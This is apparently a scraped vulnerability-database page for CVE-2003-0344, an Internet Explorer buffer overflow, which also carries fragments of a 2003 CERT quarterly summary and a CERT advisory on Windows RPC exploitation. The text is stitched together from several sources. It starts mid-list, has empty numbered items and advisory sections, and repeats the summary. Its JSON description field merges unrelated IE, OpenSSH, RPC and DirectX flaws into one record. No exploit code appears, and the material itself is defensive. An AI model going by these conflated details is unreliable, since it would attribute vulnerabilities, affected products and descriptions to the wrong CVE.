OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8. RPCSS Vulnerabilities in Microsoft Windows
On September 10, the CERT/CC reported on three vulnerabilities
that affect numerous versions of Microsoft Windows, two of which
are remotely exploitable buffer overflows that may an allow an
attacker to execute code with system privileges.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Congressional Testimony http://www.cert.org/congressional_testimony * Training Schedule http://www.cert.org/training/ * CSIRT Development http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright \xa92003 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8
iQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78 7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT rb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU UENALuNdthA= =DD60 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE-----
CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface
Original issue date: July 31, 2003 Last revised: - Source: CERT/CC
A complete revision history is at the end of this file.
I. Known exploits target TCP port 135 and create a privileged backdoor command shell on successfully compromised hosts. Some versions of the exploit use TCP port 4444 for the backdoor, and other versions use a TCP port number specified by the intruder at run-time. We have also received reports of scanning activity for common backdoor ports such as 4444/TCP. In some cases, due to the RPC service terminating, a compromised system may reboot after the backdoor is accessed by an intruder. Based on current information, we believe this vulnerability is separate and independent from the RPC vulnerability addressed in MS03-026. The CERT/CC is tracking this additional vulnerability as VU#326746 and is continuing to work to understand the issue and mitigation strategies.
In both of the attacks described above, a TCP session to port 135 is used to execute the attack. However, access to TCP ports 139 and 445 may also provide attack vectors and should be considered when applying mitigation strategies.
II.
III. Solutions
Apply patches
All users are encouraged to apply the patches referred to in Microsoft Security Bulletin MS03-026 as soon as possible in order to mitigate the vulnerability described in VU#568148. These patches are also available via Microsoft's Windows Update service.
Systems running Windows 2000 may still be vulnerable to at least a denial of service attack via VU#326746 if their DCOM RPC service is available via the network. Therefore, sites are encouraged to use the packet filtering tips below in addition to applying the patches supplied in MS03-026.
Filter network traffic
Sites are encouraged to block network access to the RPC service at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter. The specific services that should be blocked include * 135/TCP * 135/UDP * 139/TCP * 139/UDP * 445/TCP * 445/UDP
If access cannot be blocked for all external hosts, the CERT/CC recommends limiting access to only those hosts that require it for normal operation. As a general rule, the CERT/CC recommends filtering all types of network traffic that are not required for normal operation.
Because current exploits for VU#568148 create a backdoor, which is in some cases 4444/TCP, blocking inbound TCP sessions to ports on which no legitimate services are provided may limit intruder access to compromised hosts.
Recovering from a system compromise
If you believe a system under your administrative control has been compromised, please follow the steps outlined in
Steps for Recovering from a UNIX or NT System Compromise
Reporting
The CERT/CC is tracking activity related to exploitation of the first vulnerability (VU#568148) as CERT#27479 and the second vulnerability (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent to cert@cert.org with the appropriate CERT# in the subject line.
Appendix A. Vendor Information
This appendix contains information provided by vendors. If a vendor is not listed below, we have not received their comments.
Microsoft
Please see Microsoft Security Bulletin MS03-026.
Appendix B
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200306-0042",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 4.0,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 2.1,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6"
},
{
"model": "windows server 2003",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.5"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Derek Soeder\u203b dsoeder@eeye.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0344",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/severity#"
},
"@id": "https://www.variotdbs.pl/ref/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2003-0344",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2003-0344",
"trust": 1.8,
"value": "High"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#813208",
"trust": 0.8,
"value": "3.65"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#561284",
"trust": 0.8,
"value": "29.84"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#679556",
"trust": 0.8,
"value": "17.47"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#334928",
"trust": 0.8,
"value": "7.09"
},
{
"author": "CNNVD",
"id": "CNNVD-200306-069",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. A Microsoft Windows DirectX library, quartz.dll, does not properly validate certain parameters in Musical Instrument Digital Interface (MIDI) files. A remotely exploitable vulnerability has been discovered in Internet Explorer. A remote attacker could execute arbitrary code with the privileges of the user running IE. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. Description\n\n Microsoft Windows operating systems include multimedia technologies\n called DirectX and DirectShow. From Microsoft Security Bulletin\n MS03-030, \"DirectX consists of a set of low-level Application\n Programming Interfaces (APIs) that are used by Windows programs for\n multimedia support. \n\n Any application that uses DirectX/DirectShow to process MIDI files may\n be affected by this vulnerability. Of particular concern, Internet\n Explorer (IE) uses the Windows Media Player ActiveX control and\n quartz.dll to handle MIDI files embedded in HTML documents. An\n attacker could therefore exploit this vulnerability by convincing a\n victim to view an HTML document, such as a web page or an HTML email\n message, that contains an embedded MIDI file. Note that in addition to\n IE, a number of applications, including Outlook, Outlook Express,\n Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser\n ActiveX control to interpret HTML documents. \n\n Further technical details are available in eEye Digital Security\n advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers\n to these vulnerabilities as CAN-2003-0346. \n\nDisable embedded MIDI files\n\n Change the Run ActiveX controls and plug-ins security setting to\n Disable in the Internet zone and the zone(s) used by Outlook, Outlook\n Express, and any other application that uses the WebBrowser ActiveX\n control to render HTML. This modification will prevent MIDI files from\n being automatically loaded from HTML documents. This workaround is not\n a complete solution and will not prevent attacks that attempt to load\n MIDI files directly. \n\n Instructions for modifying IE security zone settings can be found in\n the CERT/CC Malicious Web Scripts FAQ. References\n\n * CERT/CC Vulnerability Note VU#561284 -\n http://www.kb.cert.org/vuls/id/561284\n * CERT/CC Vulnerability Note VU#265232 -\n http://www.kb.cert.org/vuls/id/265232\n * eEye Digital Security advisory AD20030723 -\n http://www.eeye.com/html/Research/Advisories/AD20030723.html\n * Microsoft Security Bulletin MS03-030 -\n http://microsoft.com/technet/security/bulletin/MS03-030.asp\n * Microsoft Knowledge Base article 819696 -\n http://support.microsoft.com/default.aspx?scid=kb;en-us;819696\n _________________________________________________________________\n\n These vulnerabilities were researched and reported by eEye Digital\n Security. \n _________________________________________________________________\n\n Feedback can be directed to the author, Art Manion. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. The summary includes pointers to sources of\n information for dealing with the problems. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. \n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. \n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. RPCSS Vulnerabilities in Microsoft Windows\n\n On September 10, the CERT/CC reported on three vulnerabilities\n that affect numerous versions of Microsoft Windows, two of which\n are remotely exploitable buffer overflows that may an allow an\n attacker to execute code with system privileges. \n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, 